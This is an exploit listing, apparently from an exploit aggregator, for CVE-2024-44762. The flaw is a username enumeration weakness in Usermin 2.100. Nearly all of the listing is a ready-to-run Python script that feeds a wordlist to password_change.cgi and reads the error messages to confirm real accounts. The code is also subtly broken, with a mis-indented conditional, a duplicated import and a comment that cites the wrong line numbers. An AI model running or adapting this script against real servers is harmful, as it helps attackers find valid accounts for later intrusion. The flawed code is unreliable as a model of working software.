Exploit for Usermin 2.100 Username Enumeration CVE-2024-44762

Name: Exploit for Usermin 2.100 Username Enumeration CVE-2024-44762
Rating: 5 (72 reviews)
2025-04-03 | CVSS 5.3
## https://sploitus.com/exploit?id=PACKETSTORM:190222
# Exploit Title: Usermin 2.100 - Username Enumeration
    # Date: 10.02.2024 
    # Exploit Author: Kjesper 
    # Vendor Homepage: https://www.webmin.com/usermin.html
    # Software Link: https://github.com/webmin/usermin
    # Version: <= 2.100 
    # Tested on: Kali Linux 
    # CVE: CVE-2024-44762
    # https://senscybersecurity.nl/cve-2024-44762-explained/ 
    
    #!/usr/bin/python3
    # -*- coding: utf-8 -*-
    # Usermin - Username Enumeration (Version 2.100) 
    # Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
    # Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt 
    
    import requests
    import json
    import requests
    import argparse
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    
    parser = argparse.ArgumentParser()
    
    parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
    parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
    
    args = parser.parse_args()
    
    if len(sys.argv) != 5:
        print("Please provide the -u for URL and -w for the wordlist containing the usernames")
        print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt") 
        exit()
        
    usernameFile = open(args.wordlist_users, 'r')
    
    dataUsername = usernameFile.read()
    usernameFileIntoList = dataUsername.split("\n")
    usernameFile.close()
    
    for i in usernameFileIntoList:
    
        newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
        params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
        response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
            if "Failed to change password: The current password is incorrect." in response.text:
            print("Possible user found with username: " + i)
        
        if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
            print("Application is most likely not vulnerable and are therefore quitting.")
            exit() # comment out line 33-35 if you would still like to try username enumeration.